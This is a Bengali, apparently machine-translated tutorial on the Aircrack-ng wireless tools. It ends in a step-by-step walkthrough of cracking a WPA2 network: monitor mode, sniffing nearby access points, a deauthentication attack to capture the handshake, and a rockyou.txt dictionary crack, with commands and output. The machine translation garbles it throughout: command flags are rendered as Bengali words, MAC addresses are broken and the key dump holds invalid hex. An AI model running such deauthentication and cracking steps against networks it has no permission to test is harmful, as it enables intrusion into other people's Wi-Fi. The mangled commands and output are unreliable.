এয়ারক্র্যাক-এনজি কীভাবে ব্যবহার করবেন

How Use Aircrack Ng



বেশিরভাগ সময়, লোকেরা কখনই তারা যে নেটওয়ার্কের সাথে সংযুক্ত তা নিয়ে চিন্তা করে না। তারা কখনই মনে করে না যে সেই নেটওয়ার্কটি কতটা সুরক্ষিত এবং তারা তাদের গোপনীয় ডেটা প্রতিদিন কতটা ঝুঁকির মধ্যে ফেলে। আপনি আপনার ওয়াইফাই নেটওয়ার্কে দুর্বলতা যাচাই করতে পারেন যাকে বলা হয় একটি খুব শক্তিশালী টুল ব্যবহার করে এয়ারক্র্যাক-এনজি এবং ওয়্যারশার্ক। Wireshark নেটওয়ার্ক কার্যকলাপ নিরীক্ষণ করতে ব্যবহৃত হয়। এয়ারক্র্যাক-এনজি এটি একটি আক্রমণাত্মক সরঞ্জামের মতো যা আপনাকে হ্যাক করতে এবং ওয়্যারলেস সংযোগগুলিতে অ্যাক্সেস দিতে দেয়। অনুপ্রবেশকারী হিসাবে চিন্তা করা সবসময় হ্যাকের বিরুদ্ধে নিজেকে রক্ষা করার সবচেয়ে নিরাপদ উপায়। এয়ারক্র্যাক সম্পর্কে জেনে আপনার অনুপ্রবেশকারী আপনার সিস্টেমে প্রবেশের জন্য সঠিক পদক্ষেপগুলি বুঝতে সক্ষম হতে পারে। আপনি তখন আপনার নিজের সিস্টেমে কমপ্লায়েন্স চেক করতে পারেন যাতে এটি অনিরাপদ না হয়।

এয়ারক্র্যাক-এনজি ওয়াইফাই নেটওয়ার্ক নিরাপত্তা পরীক্ষা করার জন্য ডিজাইন করা সফটওয়্যারের একটি সম্পূর্ণ সেট। এটি কেবল একটি একক হাতিয়ার নয় বরং সরঞ্জামগুলির একটি সংগ্রহ, যার প্রত্যেকটি একটি নির্দিষ্ট উদ্দেশ্য সম্পাদন করে। ওয়াইফাই নিরাপত্তার বিভিন্ন ক্ষেত্রে কাজ করা যেতে পারে, যেমন অ্যাক্সেস পয়েন্ট পর্যবেক্ষণ করা, পরীক্ষা করা, নেটওয়ার্ক আক্রমণ করা, ওয়াইফাই নেটওয়ার্ক ফাটানো এবং এটি পরীক্ষা করা। এয়ারক্র্যাকের মূল উদ্দেশ্য হল প্যাকেটগুলি আটকানো এবং পাসওয়ার্ডগুলি ভাঙার জন্য হ্যাশগুলি বোঝা। এটি প্রায় সব নতুন বেতার ইন্টারফেস সমর্থন করে। এয়ারক্র্যাক-এনজি একটি পুরানো টুল স্যুট এয়ারক্র্যাকের উন্নত সংস্করণ, এনজি বোঝায় নতুন প্রজন্ম । কিছু দুর্দান্ত সরঞ্জাম যা একটি বড় কাজ করার জন্য একসাথে কাজ করে।







এয়ারমন:

এয়ারম্যাক-এনজি এয়ারক্র্যাক-এনজি কিটে অন্তর্ভুক্ত রয়েছে যা মনিটর মোডে নেটওয়ার্ক ইন্টারফেস কার্ড রাখে। নেটওয়ার্ক কার্ড সাধারণত NIC- এর MAC ঠিকানা দ্বারা নির্ধারিত প্যাকেটগুলি তাদের জন্যই গ্রহণ করবে, কিন্তু এয়ারমন-এনজি সহ, সমস্ত ওয়্যারলেস প্যাকেট, সেগুলি তাদের জন্য লক্ষ্যবস্তু করা হোক বা না হোক, তাও গ্রহণ করা হবে। আপনি অ্যাক্সেস পয়েন্টের সাথে লিঙ্ক বা প্রমাণীকরণ ছাড়াই এই প্যাকেটগুলি ধরতে সক্ষম হবেন। এটি মনিটর মোডে নেটওয়ার্ক ইন্টারফেস রেখে একটি অ্যাক্সেস পয়েন্টের অবস্থা পরীক্ষা করতে ব্যবহৃত হয়। প্রথমে মনিটর মোড চালু করার জন্য ওয়্যারলেস কার্ড কনফিগার করতে হবে, তারপর যদি আপনি মনে করেন যে কোন প্রক্রিয়া এটিতে হস্তক্ষেপ করছে তবে সমস্ত ব্যাকগ্রাউন্ড প্রসেসগুলি হত্যা করুন। প্রক্রিয়াগুলি বন্ধ করার পরে, নিচের কমান্ডটি চালানোর মাধ্যমে বেতার ইন্টারফেসে মনিটর মোড সক্ষম করা যেতে পারে:



[ইমেল সুরক্ষিত]: ~ $sudoairmon-ng শুরু wlan0#

আপনি নিচের কমান্ডটি ব্যবহার করে যে কোনও সময় এয়ারমন-এনজি বন্ধ করে মনিটর মোডটি অক্ষম করতে পারেন:

[ইমেল সুরক্ষিত]: ~ $sudoairmon-ng স্টপ wlan0#

এয়ারডাম্প:

Airodump-ng আমাদের চারপাশের সমস্ত নেটওয়ার্কের তালিকা এবং তাদের সম্পর্কে মূল্যবান তথ্য দেখতে ব্যবহৃত হয়। Airodump-ng এর মৌলিক কার্যকারিতা হল প্যাকেট শুঁকানো, তাই মনিটর মোডে রাখার সময় এটি মূলত আমাদের চারপাশের সমস্ত প্যাকেট ধরার জন্য প্রোগ্রাম করা হয়েছে। আমরা এটি আমাদের চারপাশের সমস্ত সংযোগের বিরুদ্ধে চালাব এবং নেটওয়ার্কের সাথে সংযুক্ত ক্লায়েন্টের সংখ্যা, তাদের সংশ্লিষ্ট ম্যাক ঠিকানা, এনক্রিপশন স্টাইল এবং চ্যানেলের নাম সংগ্রহ করব এবং তারপর আমাদের টার্গেট নেটওয়ার্ককে টার্গেট করা শুরু করব।

Airodump-ng কমান্ড টাইপ করে এবং এটিকে প্যারামিটার হিসেবে নেটওয়ার্ক ইন্টারফেসের নাম দিয়ে আমরা এই টুলটি সক্রিয় করতে পারি। এটি সমস্ত অ্যাক্সেস পয়েন্ট, ডেটা প্যাকেটের পরিমাণ, ব্যবহৃত এনক্রিপশন এবং প্রমাণীকরণ পদ্ধতি এবং নেটওয়ার্কের নাম (ESSID) তালিকাভুক্ত করবে। একটি হ্যাকিং দৃষ্টিকোণ থেকে, ম্যাক ঠিকানাগুলি সবচেয়ে গুরুত্বপূর্ণ ক্ষেত্র।

[ইমেল সুরক্ষিত]: ~ $sudoairodump-ng wlx0mon

এয়ারক্র্যাক:

এয়ারক্র্যাক পাসওয়ার্ড ক্র্যাকিংয়ের জন্য ব্যবহৃত হয়। এয়ারডাম্প ব্যবহার করে সমস্ত প্যাকেট ক্যাপচার করার পরে, আমরা এয়ারক্র্যাকের মাধ্যমে চাবি ফাটাতে পারি। এটি দুটি পদ্ধতি PTW এবং FMS ব্যবহার করে এই চাবিগুলিকে ক্র্যাক করে। PTW পদ্ধতির দুটি ধাপে সম্পন্ন করা হয়। প্রথমে, শুধুমাত্র এআরপি প্যাকেটগুলি ব্যবহার করা হচ্ছে, এবং কেবল তখনই, যদি অনুসন্ধানের পরে কীটি ফাটল না হয়, তবে এটি অন্য সমস্ত বন্দী প্যাকেট ব্যবহার করে। PTW পদ্ধতির একটি প্লাস পয়েন্ট হল যে সমস্ত প্যাকেট ক্র্যাকিংয়ের জন্য ব্যবহার করা হয় না। দ্বিতীয় পদ্ধতিতে, অর্থাৎ এফএমএস, আমরা কী ফাটানোর জন্য পরিসংখ্যানগত মডেল এবং বর্বর বল অ্যালগোস উভয়ই ব্যবহার করি। একটি অভিধান পদ্ধতিও ব্যবহার করা যেতে পারে।

Aireplay:

এয়ারপ্লে-এনজি ট্রাফিক তৈরি বা ত্বরান্বিত করতে একটি বেতার নেটওয়ার্কে প্যাকেট প্রবর্তন করে। দুটি ভিন্ন উত্স থেকে প্যাকেটগুলি এয়ারপ্লে-এনজি দ্বারা ধরা যেতে পারে। প্রথমটি লাইভ নেটওয়ার্ক, এবং দ্বিতীয়টি ইতিমধ্যে বিদ্যমান pcap ফাইল থেকে প্যাকেট। এয়ারপ্লে-এনজি একটি ডি-প্রমাণীকরণ আক্রমণের সময় দরকারী যা একটি ওয়্যারলেস অ্যাক্সেস পয়েন্ট এবং একটি ব্যবহারকারীকে লক্ষ্য করে। তদুপরি, আপনি এয়ারপ্লে-এনজি দিয়ে কফি ল্যাটে আক্রমণের মতো কিছু আক্রমণ করতে পারেন, এটি এমন একটি সরঞ্জাম যা আপনাকে ক্লায়েন্টের সিস্টেম থেকে একটি কী পেতে দেয়। আপনি একটি ARP প্যাকেট ধরার পরে এটি অর্জন করতে পারেন এবং তারপর এটি ম্যানিপুলেট করে এবং সিস্টেমে ফেরত পাঠাতে পারেন। ক্লায়েন্ট তখন একটি প্যাকেট তৈরি করবে যা এয়ারডাম্প দ্বারা ধরা যাবে এবং এয়ারক্র্যাক সেই সংশোধিত প্যাকেট থেকে চাবি ফাটাবে। এয়ারপ্লে-এনজির কিছু অন্যান্য আক্রমণের বিকল্পগুলির মধ্যে রয়েছে চপচপ, ফ্র্যাগমেন্ট আরপ্লেপ্লে ইত্যাদি।

এয়ারবেস:

এয়ারবেস-এনজি একটি অনুপ্রবেশকারীর কম্পিউটারকে অন্যদের লিঙ্ক করার জন্য একটি আপোস করা সংযোগ পয়েন্টে রূপান্তর করতে ব্যবহৃত হয়। এয়ারবেস-এনজি ব্যবহার করে, আপনি একটি আইনি অ্যাক্সেস পয়েন্ট হিসাবে দাবি করতে পারেন এবং আপনার নেটওয়ার্কের সাথে সংযুক্ত কম্পিউটারে ম্যান-ইন-দ্য-মিডল আক্রমণ পরিচালনা করতে পারেন। এই ধরণের আক্রমণকে বলা হয় ইভিল টুইন অ্যাটাক। মৌলিক ব্যবহারকারীদের জন্য একটি আইনি অ্যাক্সেস পয়েন্ট এবং একটি জাল অ্যাক্সেস পয়েন্টের মধ্যে পার্থক্য করা অসম্ভব। সুতরাং, দুষ্ট যমজ হুমকি সবচেয়ে বিপজ্জনক ওয়্যারলেস হুমকিগুলির মধ্যে আমরা আজ সম্মুখীন।

এয়ারলিব-এনজি:

এয়ারলিব পাসওয়ার্ড তালিকা এবং অ্যাক্সেস পয়েন্ট সংরক্ষণ এবং পরিচালনা করে হ্যাকিং প্রক্রিয়াটিকে গতি দেয়। এই প্রোগ্রাম দ্বারা ব্যবহৃত ডাটাবেস ম্যানেজমেন্ট সিস্টেম হল SQLite3, যা বেশিরভাগই সকল প্ল্যাটফর্মে পাওয়া যায়। পাসওয়ার্ড ক্র্যাকিংয়ের মধ্যে রয়েছে জোড়া জোড়া মাস্টার কী গণনা যার মাধ্যমে ব্যক্তিগত ক্ষণস্থায়ী কী (PTK) বের করা হয়। PTK ব্যবহার করে, আপনি একটি প্রদত্ত প্যাকেটের জন্য ফ্রেম মেসেজ আইডেন্টিফিকেশন কোড (MIC) নির্ধারণ করতে পারেন এবং তাত্ত্বিকভাবে MIC কে প্যাকেটের অনুরূপ বলে মনে করতে পারেন, তাই PTK যদি সঠিক ছিল, PMK ঠিক ছিল।

ডাটাবেসে সংরক্ষিত পাসওয়ার্ড তালিকা এবং অ্যাক্সেস নেটওয়ার্ক দেখতে, নিম্নলিখিত কমান্ডটি টাইপ করুন:

[ইমেল সুরক্ষিত]: ~ $sudoairolib-ng testdatabase ats পরিসংখ্যান

এখানে testdatabase হল db যা আপনি অ্যাক্সেস বা তৈরি করতে চান, এবং –stats হল আপনি যে অপারেশনটি করতে চান। আপনি ডাটাবেস ক্ষেত্রগুলিতে একাধিক অপারেশন করতে পারেন, যেমন কিছু SSID বা কিছুকে সর্বাধিক অগ্রাধিকার দেওয়া। এয়ারক্র্যাক-এনজির সাথে এয়ারলিব-এনজি ব্যবহার করতে, নিম্নলিখিত কমান্ডটি প্রবেশ করান:

[ইমেল সুরক্ষিত]: ~ $sudoএয়ারক্র্যাক-এনজি-আরtestdatabase wpa2.eapol.cap

এখানে আমরা ইতিমধ্যে গণনা করা PMK- এর সংরক্ষিত ব্যবহার করছি পরীক্ষা ডাটাবেস পাসওয়ার্ড ক্র্যাকিং প্রক্রিয়া দ্রুত করার জন্য।

এয়ারক্র্যাক-এনজি ব্যবহার করে WPA/WPA2 ক্র্যাক করা:

এয়ারক্র্যাক-এনজি তার কয়েকটি দুর্দান্ত সরঞ্জামগুলির সাহায্যে কী করতে পারে তার একটি ছোট উদাহরণ দেখি। আমরা একটি ডিকশনারি পদ্ধতি ব্যবহার করে WPA/WPA2 নেটওয়ার্কের প্রি-শেয়ার করা কী ক্র্যাক করব।

মনিটর মোড সমর্থন করে এমন নেটওয়ার্ক ইন্টারফেসগুলি তালিকাভুক্ত করা আমাদের প্রথম কাজ। এটি নিম্নলিখিত কমান্ড ব্যবহার করে করা যেতে পারে:

[ইমেল সুরক্ষিত]: ~ $sudoএয়ারমন-এনজি

PHY ইন্টারফেস ড্রাইভার চিপসেট

Phy0 wlx0 rtl8xxxu রিয়েলটেক সেমিকন্ডাক্টর কর্পোরেশন।

আমরা একটি ইন্টারফেস দেখতে পারি; এখন, আমাদের নিম্নলিখিত নেটওয়ার্ক ব্যবহার করে মনিটর মোডে (wlx0) পাওয়া নেটওয়ার্ক ইন্টারফেসটি রাখতে হবে:

[ইমেল সুরক্ষিত]: ~ $sudoairmon-ng শুরু wlx0

এটি কল করা ইন্টারফেসে মনিটর মোড সক্ষম করেছে wlx0mon

এখন আমাদের মনিটর মোডে আমাদের নেটওয়ার্ক ইন্টারফেসের মাধ্যমে কাছাকাছি রাউটারগুলির মাধ্যমে সম্প্রচার শোনা শুরু করা উচিত।

[ইমেল সুরক্ষিত]: ~ $sudoairodump-ng wlx0mon

সিএইচ5 ][অতিবাহিত:30গুলি][ ২০২০-12-02 00:17



BSSID PWR বীকন#ডেটা, #/s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: সিই:31 -চার পাঁচ 62 27 0 54e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10:থাকা-63 77 0 0 654 ই। WPA2 CCMP PSK হ্যাকমে

C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74: দেয়:88: এফএ:38: 02-68 28 2 0 এগারো54e WPA2 CCMP PSK TP-Link_3802



BSSID স্টেশন PWR হার হারানো ফ্রেম প্রোব



E4: 6F:13: 04: সিই:315C: 3A:চার পাঁচ: D7: EA: 8B -3 0- 1 ই8 5

E4: 6F:13: 04: সিই:31C4:67: D3: C2: CD: D7 -331 ই -6 ই0 3

E4: 6F:13: 04: সিই:315C: C3: 07:56:61: EF -35 0- 0 6

E4: 6F:13: 04: সিই:31বিসি:91: B5: F8: 7E: D5 -390 ই- 1002 13

আমাদের টার্গেট নেটওয়ার্ক হল এটা ভেঙে ফেল এই ক্ষেত্রে, যা বর্তমানে চ্যানেল 1 এ চলছে।

এখানে টার্গেট নেটওয়ার্কের পাসওয়ার্ড ক্র্যাক করার জন্য, আমাদের একটি 4-উপায় হ্যান্ডশেক ক্যাপচার করতে হবে, যা যখন একটি ডিভাইস একটি নেটওয়ার্কের সাথে সংযোগ করার চেষ্টা করে তখন ঘটে। আমরা নিম্নলিখিত কমান্ড ব্যবহার করে এটি ক্যাপচার করতে পারি:

[ইমেল সুরক্ষিত]: ~ $sudoএয়ারডাম্প-এনজি-সি --bssid E4: 6F:13: 04: সিই:31 -ভিতরে /হোম wlx0

-সি : চ্যানেল

- বিএসএস : টার্গেট নেটওয়ার্কের Bssid

-ভিতরে : যে ডিরেক্টরিতে pcap ফাইলটি রাখা হবে তার নাম

এখন আমাদের নেটওয়ার্কে সংযোগের জন্য একটি ডিভাইসের জন্য অপেক্ষা করতে হবে, কিন্তু হ্যান্ডশেক ক্যাপচার করার আরও ভাল উপায় আছে। আমরা নিম্নলিখিত কমান্ড ব্যবহার করে একটি deauthentication আক্রমণ ব্যবহার করে AP- কে ডিভাইসগুলি প্রমাণহীন করতে পারি:

[ইমেল সুরক্ষিত]: ~ $sudoaireplay- এনজি-0 -প্রতিE4: 6F:13: 04: সিই:31

প্রতি : টার্গেট নেটওয়ার্কের Bssid

-0 : deauthentication আক্রমণ

আমরা সমস্ত ডিভাইস সংযোগ বিচ্ছিন্ন করেছি, এবং এখন আমাদের একটি ডিভাইসের নেটওয়ার্কের সাথে সংযোগ স্থাপনের জন্য অপেক্ষা করতে হবে।

সিএইচ ][অতিবাহিত:30গুলি][ ২০২০-12-02 00:02][WPA হ্যান্ডশেক: E4: 6F:13: 04: সিই:31



BSSID PWR RXQ Beacons#ডেটা, #/s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: সিই:31 -47 228 807 36 54 তম WPA2 CCMP PSK P



BSSID স্টেশন PWR হার হারানো ফ্রেম প্রোব



E4: 6F:13: 04: সিই:31বিসি:91: B5: F8: 7E: D5 -35 0- 0

E4: 6F:13: 04: সিই:315C: 3A:চার পাঁচ: D7: EA: 8B -290 ই- 1 ই0 22

E4: 6F:13: 04: সিই:31 88:28: B3:30:27: 7 ই -310 ই- 0 32

E4: 6F:13: 04: সিই:31C4:67: D3: C2: CD: D7 -350 ই- 6 ই263 708এটা ভেঙে ফেল

E4: 6F:13: 04: সিই:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86

E4: 6F:13: 04: সিই:315C: C3: 07:56:61: EF -37 0- 1 ই0

আমরা একটি আঘাত পেয়েছি, এবং ঠিক ডান দিকের উপরের কোণার দিকে তাকিয়ে আমরা দেখতে পাচ্ছি একটি হ্যান্ডশেক ধরা পড়েছে। এখন নির্দিষ্ট ফোল্ডারে দেখুন ( /বাড়ি আমাদের ক্ষেত্রে) a এর জন্য .pcap ফাইল

WPA কী ক্র্যাক করার জন্য, আমরা নিম্নলিখিত কমান্ডটি ব্যবহার করতে পারি:

[ইমেল সুরক্ষিত]: ~ $sudoএয়ারক্র্যাক-এনজি-এ 2 -ভিতরেrockyou.txt-বিE4: 6F:13: 04: সিই:31handshake.cap

b: টার্গেট নেটওয়ার্কের Bssid

-এ 2: WPA2 মোড

Rockyou.txt: অভিধানফাইলব্যবহৃত

Handshake.cap:ফাইল যাধারণকৃত হ্যান্ডশেক রয়েছে

এয়ারক্র্যাক-এনজি1.2বিটা 3

[00:01:49] 10566চাবি পরীক্ষা করা হয়েছে(1017.96প্রতি/গুলি)

কী ফাউন্ড! [আমাকে বুঝতে পেরেছ]

মাস্টার কী: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896 বি 7 বি 6 ডি

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6Fপঞ্চাশ


ক্ষণস্থায়ী কী: 4D C4 5R 6T76 996G 7H 8D ইসি

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896 খ

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896 খ

ম্যাক: CB 5A F8 CE62B2 1B F7 6Fপঞ্চাশC025 62E9 5D71

আমাদের টার্গেট নেটওয়ার্কের চাবিটি সফলভাবে ক্র্যাক করা হয়েছে।

উপসংহার:

ওয়্যারলেস নেটওয়ার্ক সর্বত্র রয়েছে, প্রতিটি কোম্পানি ব্যবহার করে, স্মার্টফোন ব্যবহারকারী শ্রমিক থেকে শুরু করে শিল্প নিয়ন্ত্রণ ডিভাইস পর্যন্ত। গবেষণা অনুসারে, ২০২১ সালে ইন্টারনেট ট্রাফিকের প্রায় ৫০ শতাংশেরও বেশি ওয়াইফাই হবে। অন্য কোন ব্যবহারকারীর জন্য, এবং আপনি আপনার মোবাইল ডিভাইসগুলিকে আপনার বাড়ির অফিসে সহজেই সংযুক্ত করতে পারেন যখন আপনি সেখানে নেই।

এই সুবিধাগুলি সত্ত্বেও, আপনার গোপনীয়তা এবং নিরাপত্তা সম্পর্কে একটি বড় প্রশ্ন চিহ্ন রয়েছে। এই নেটওয়ার্ক হিসাবে; রাউটারের ট্রান্সমিটিং রেঞ্জের মধ্যে সবার জন্য উন্মুক্ত, তারা সহজেই আক্রমণ করতে পারে এবং আপনার ডেটা সহজেই আপোস করা যায়। উদাহরণস্বরূপ, যদি আপনি কিছু পাবলিক ওয়াইফাই এর সাথে সংযুক্ত থাকেন, সেই নেটওয়ার্কের সাথে সংযুক্ত যে কেউ সহজেই আপনার নেটওয়ার্ক ট্র্যাফিক কিছু বুদ্ধিমত্তা ব্যবহার করে এবং উপলব্ধ দুর্দান্ত সরঞ্জামগুলির সাহায্যে পরীক্ষা করতে পারে এবং এমনকি এটি ডাম্প করতে পারে।